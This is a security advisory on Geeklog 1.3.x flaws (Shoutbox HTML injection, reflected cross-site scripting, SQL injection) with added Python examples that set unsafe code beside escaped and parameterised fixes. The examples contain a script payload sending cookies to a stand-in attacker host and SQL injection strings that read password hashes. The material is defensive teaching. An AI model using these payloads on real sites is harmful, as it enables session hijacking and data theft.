Title: Multiple Geeklog Vulnerabilities
Severity: MODERATE
Description:
Multiple vulnerabilities have been reported in Geeklog. The following issues were reported:
An HTML injection vulnerability that may allow unauthenticated remote attackers to submit hostile HTML and script code through the Shoutbox, where it is rendered in the browsers of other Geeklog users who view it.
Multiple cross-site scripting issues in the index.php, brokenfile.php and read-story.php scripts that may permit remote attackers to construct malicious links to a Geeklog site; the hostile HTML embedded in such a link is rendered in the browser of any user who follows it.
The HTML injection and cross-site scripting issues could potentially be exploited to steal cookie-based authentication credentials from legitimate users, allowing an attacker to impersonate them. Other attacks are also possible.
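The following is an added illustration, not code from Geeklog or from this advisory, of the two injection patterns described above and of the cookie-theft consequence. The Shoutbox message, the "topic" query parameter and the "session" cookie name are constructed stand-ins, not Geeklog's actual field or cookie names. The unsafe functions concatenate untrusted text into HTML; the safe variants escape it first. The Set-Cookie helper shows the HttpOnly flag, which stops the payload's document.cookie read but does not remove the underlying injection.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, quote

# Constructed sample payloads (not taken from any real Geeklog exploit).
# The Shoutbox text and the "topic" parameter are illustrative stand-ins.
HOSTILE_SHOUT = (
    '<script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)
# A crafted link carries the same payload URL-encoded in a query parameter.
HOSTILE_LINK_QUERY = "topic=" + quote(HOSTILE_SHOUT, safe="")


def render_shout_unsafe(message: str) -> str:
    """Vulnerable pattern: untrusted text is concatenated straight into HTML."""
    return '<div class="shout">' + message + "</div>"


def render_shout_safe(message: str) -> str:
    """Hardened pattern: escape <, >, &, ' and " before placing text in HTML."""
    return '<div class="shout">' + html.escape(message, quote=True) + "</div>"


def echo_param_unsafe(query_string: str, name: str) -> str:
    """Reflected variant: a query parameter is echoed into the page verbatim."""
    value = parse_qs(query_string).get(name, [""])[0]
    return "<h1>Topic: " + value + "</h1>"


def echo_param_safe(query_string: str, name: str) -> str:
    """Reflected variant with output escaping applied."""
    value = parse_qs(query_string).get(name, [""])[0]
    return "<h1>Topic: " + html.escape(value, quote=True) + "</h1>"


def contains_active_markup(rendered: str) -> bool:
    """Deliberately crude detector, only to make the difference visible here."""
    lowered = rendered.lower()
    return "<script" in lowered or "javascript:" in lowered or " onerror=" in lowered


def session_cookie_header(session_id: str, http_only: bool) -> str:
    """Build a Set-Cookie header for a hypothetical session cookie. With
    HttpOnly set, the browser withholds the cookie from document.cookie,
    so the script payload above cannot read it (it can still act on the
    user's behalf from inside the page, so escaping remains the real fix)."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["path"] = "/"
    if http_only:
        cookie["session"]["httponly"] = True
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_shout_unsafe(HOSTILE_SHOUT))
    print(render_shout_safe(HOSTILE_SHOUT))
    print(echo_param_unsafe(HOSTILE_LINK_QUERY, "topic"))
    print(echo_param_safe(HOSTILE_LINK_QUERY, "topic"))
    print(session_cookie_header("abc123", http_only=True))
```

Escaping must happen at the point of output for every untrusted value, whether it arrived in a stored Shoutbox post or in the query string of a link; a check applied only when data is stored misses the reflected case entirely.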
Several SQL injection issues have been reported in the index.php, viewtopic.php, visit.php, viewcat.php, comment.php, read-story.php and singlefile.php scripts. These issues could permit remote attackers to inject malicious SQL syntax into database queries, potentially allowing unauthorized access to sensitive information; other consequences, such as modification of data, are possible depending on the query affected.
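To make the SQL injection mechanism concrete, the following is an added example written for this page; it is not Geeklog's code and does not use Geeklog's schema. It builds an in-memory SQLite database with hypothetical "stories" and "users" tables, then looks up a story by a hypothetical "sid" request parameter two ways: by splicing the value into the query text (the vulnerable pattern) and by binding it as a parameter. The two attacker inputs are constructed to show a filter bypass and a UNION that pulls rows from an unrelated table.

```python
import sqlite3

# Constructed, in-memory stand-in for an application database. Table and
# column names are hypothetical; they are not taken from Geeklog's schema.
SCHEMA = """
CREATE TABLE stories (sid TEXT, title TEXT, draft INTEGER);
CREATE TABLE users (uid INTEGER, username TEXT, passwd TEXT);
INSERT INTO stories VALUES ('welcome', 'Welcome to the site', 0);
INSERT INTO stories VALUES ('draft1', 'Unpublished draft', 1);
INSERT INTO users VALUES (2, 'Admin', 'hash-of-admin-password');
"""

# Constructed attacker inputs for the hypothetical "sid" request parameter.
# The first closes the quoted literal and neutralises the draft filter; the
# second appends a UNION that reads a column from a different table.
PAYLOAD_BYPASS = "' OR 1=1 --"
PAYLOAD_UNION = "' UNION SELECT passwd FROM users --"


def open_db() -> sqlite3.Connection:
    """Create the sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def published_title_unsafe(conn: sqlite3.Connection, sid: str) -> list:
    """Vulnerable pattern: the request value is spliced into the SQL text,
    so quotes and comment markers inside it rewrite the query's logic."""
    sql = "SELECT title FROM stories WHERE sid = '" + sid + "' AND draft = 0"
    return [row[0] for row in conn.execute(sql)]


def published_title_safe(conn: sqlite3.Connection, sid: str) -> list:
    """Hardened pattern: a bound parameter is always treated as data, so the
    same payloads simply fail to match any story id."""
    sql = "SELECT title FROM stories WHERE sid = ? AND draft = 0"
    return [row[0] for row in conn.execute(sql, (sid,))]


if __name__ == "__main__":
    db = open_db()
    for payload in ("welcome", PAYLOAD_BYPASS, PAYLOAD_UNION):
        print(repr(payload))
        print("  unsafe:", published_title_unsafe(db, payload))
        print("  safe:  ", published_title_safe(db, payload))
```

The "AND draft = 0" clause stands in for whatever access restriction the original query carried; the bypass payload shows how a trailing comment removes it, and the UNION payload shows how an unrelated table becomes readable through a query that was never meant to touch it. Escaping quote characters in input mitigates the string-literal case but not numeric parameters, so parameter binding is the durable fix.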
Weaknesses in the Geeklog implementation have also been reported, such as incorrect logging of requests that arrive through a proxy and inadequate facilities for denying access by IP address.
Some of these issues may be related to previously documented vulnerabilities in Geeklog. These issues are currently pending further analysis. New BIDs will be created and existing BIDs updated where it is appropriate when analysis is complete.
Affected Products:
- Geeklog Geeklog 1.3.0
- Geeklog Geeklog 1.3.5
- Geeklog Geeklog 1.3.5 sr1
- Geeklog Geeklog 1.3.5 sr2
- Geeklog Geeklog 1.3.7
- Geeklog Geeklog 1.3.7 sr1
- Geeklog Geeklog 1.3.7 sr2
- Geeklog Geeklog 1.3.8
- Geeklog Geeklog 1.3.8 -1
- Geeklog Geeklog 1.3.8 rc1
- Geeklog Geeklog 1.3.8 rc2
References:
- Geeklog: Geeklog Homepage
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.